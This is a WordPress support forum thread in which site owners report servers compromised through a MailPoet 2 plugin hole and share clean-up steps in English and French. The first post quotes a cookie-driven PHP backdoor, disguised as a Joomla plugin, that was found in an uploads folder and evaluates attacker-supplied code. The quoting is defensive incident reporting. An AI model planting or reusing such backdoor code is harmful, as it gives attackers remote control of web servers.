Support » Plugin: MailPoet 2 » Plugin Hacked

  • Resolved webmistress666


    2.6.8 – 2014-07-04

    Fixed security issue reported by Dominic

    Well, I’m hoping this was the culprit, but regardless, our site was compromised via Mail Poet last week. There was a backdoor being used to send out massive amounts of spam and our webhost had to shut it down.

    Files were found in:

    wp-content/uploads/ (a file called ajax.php)

    These were always .php files, sometimes with a gibberish name, other times with a name like “ajax.php” or “index.php” where there shouldn’t have been one (in the themes folders).

    The index.php file inside the “wysija/themes/main/” folders looked like this:

     * @package     Joomla.Plugin.System
     * @since       1.5
    class PlgSysJoomla {
    public function __construct() {
    if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
    $index=new PlgSysJoomla;

    Anyway, anyone else have these issues? I updated Mail Poet, deleted all suspicious files, changed my FTP password, and am hoping that’s enough.

Viewing 15 replies - 1 through 15 (of 23 total)
  • Yes!

    I’m in the process of backing everything up and plan to wipe out the whole WordPress directory and reinstall. I’m not sure if there are added files in there, but many of the existing ones have been modified with an eval and base 64 code at the top. It looks like it’s managed to get into everything, not just the uploads area.

    What I can’t figure out is if it could have inserted itself into the database proper, or if it just modified the WordPress directory. I’m hoping a reinstall alone will take care of it. Not sure how to go about checking the database for issues. Been through those links that keep getting posted here everytime someone says they’ve been hacked and still can’t find an answer to the db question.

    Awesome, thanks for the link! We’ve had our site hacked before, years ago, and it was just like you’re describing with the base 64 encode. It was a TOTAL NIGHTMARE. We ended up just exporting all our content via WordPress to an XML file, wiping the installation entirely, installing a new one, and then importing the posts.

    Luckily, that’s not happening to us currently. I’m hoping we managed to catch it in time. There were only about 4 suspicious files and nothing was encoded. Still, I’ll be sure to keep an eye out for anything fishy.

    Good luck with yours.

    I cleaned the initial infection, but there were backdoors — it roamed all through my webserver, with that base64 thing. I spent 8 hours cleaning everything, and it’s been clear since. I’m unwilling to do the “export everything then burn it with fire” approach just yet, but if it comes back I might have to.

    I’m kind of bothered that there isn’t more information on this at MailPoet’s site, at least a knowledge base article on the subject. To acknowledge such a severe vulnerability as a line item on a changelog seems a bit irresponsible, considering they gave hackers console-level access to our servers for four days.



    Forum Moderator

    What makes you think that the plugin had anything to do with the hack as opposed to simply being a victim of it?

    Did you read the link AddyBean posted?

    In my case, the first files were uploaded to the wysija/themes directory, which is what tipped me off to it being a hole in the plugin. Logs and security fixes confirmed.

    Hi there, all of my sites with MailPoet have been hacked. I’m pretty sure at least one of them has the last version, so for now I just delete the plugin.

    A little update: actually, a file was uploaded to the themes directory on July 5 BEFORE updating MailPoet, and it’s only in the night of Thursday the 17 at 23:45 (French time) that the flaw was exploited. So the current version may be clean, but despite updating the plugin, the flaw may persist because of the infected file in wp-content/upload/wysija/themes/*/*.php.

    Sorry for my bad English.

    Hi Aral,
    your problem has been solved?
    I think also be infected since the night of Thursday to Friday.
    Je suis français désolé pour la traduction anglaise.


    Yes problem solved the hard way:
    – reinstalled WP
    – reinstalled all plugins
    – reinstalled theme
    – verify and correct manually all files not updated in the process (like wp-config.php)
    – verify database for “blank” admin user not be created

    — français 😉 —

    Oui, problème résolu à la sauvage :
    – Réinstallé WP
    – Réinstallé tous les plugins
    – Réinstallé les thèmes
    – Vérification et correction manuelle de tous les fichiers non mis à jour dans le processus (comme wp-config.php)
    – Vérification de la base de données à la recherche d’un utilisateur admin créé en douce (j’ai lu ça sur un forum de sécurité, plusieurs hackers ont exploité la faille donc les attaques peuvent varier de la redirection de site, à la diffusion de malware, et jusqu’à la création de backdoor).

    Pour la petite histoire, j’ai deux sites que je gère qui ont eu le problème (chez ovh, un qui a planté, l’autre que j’ai détecté moi-même une fois la source de l’infection connue), et on a fait appel à moi pour des conseils sur un autre, et enfin pour une intervention sur un quatrième (hébergé chez 1&1 dont l’anti-virus a détecté le problème et passé tous les fichiers php en droit 0200).

    Je pense qu’il y a beaucoup, beaucoup de sites infectés non détectés qui traînent… car comme j’écrivais en anglais ci-dessus, le plug-in à beau être à jour, dans la fenêtre de temps de correction de la faille, des fichiers ‘backdoor’ ont été envoyés (tous dans wp-content/upload à priori).

    Bon courage !

    Thanks for your answer
    Merci pour tes indications, j’ai déjà tout réinstallé une première fois, réinfecté 48h après, avec ce plugin toujours actif.
    Je viens de le viré, plus les fichiers suspects se trouvant dans upload également.
    J’hésite également a supprimé les données du plugin de ma base de registre.
    J’attends maintenant de voir si je suis de nouveau infecté.
    Pour info, je suis sous ovh et j’avais une page blanche à la place de mon site, tous mes fichiers php étaient touchés.

    The plugin is supposed to be clean now, so if you were reinfected when you had the latest version, this is probably because of the omission of one of the “backdoor” files… or the plugin is not so secure…

    I don’t think you need to delete data in the database, just check if there is no new suspect user.

    Le plugin est sensé être clean maintenant, donc si tu as été réinfecté alors que tu avais la dernière version, c’est sûrement à cause de l’oubli d’un des fichiers “backdoor”… ou alors que le plugin n’est pas sécurisé que ça.

    Pas besoin de supprimer les données dans la base à priori, mais vérifier qu’il n’y a pas eu d’utilisateur suspect ajouté.

    My site and that of a friend of mine was infected after the release of the update, on July 18. The server blocked my site as malicious and promised to put it back online only deleting the entire site. I have reinstalled WP, reinstalled all plugins, reinstalled theme…

    Plugin Author MailPoet


    Hi guys,

    We’re really sorry for that.

    We published a guide in our site which can help you recovering your sites:

    there was another hack attack recently, it seems it was not related to MailPoet, as some victims did not have it installed:

    My site was hacked AFTER 2.6.8 was installed, and as a result, my host shut my site down this morning (with warning). After speaking with my host’s tech support, I decided that the best thing to do is to “nuke and pave” – wipe my directories, remove the database and start with a clean installation of WordPress, my theme and plugins, and hopefully restore my. The other alternative, according to them, was to review all of my files and search for malicious code. Unfortunately, Mailpoet’s support solution is vague and doesn’t really offer a true solution. So, as a result, I’m looking at many hours of work ahead. Thanks a frigging bunch, Mailpoet.

Viewing 15 replies - 1 through 15 (of 23 total)
  • The topic ‘Plugin Hacked’ is closed to new replies.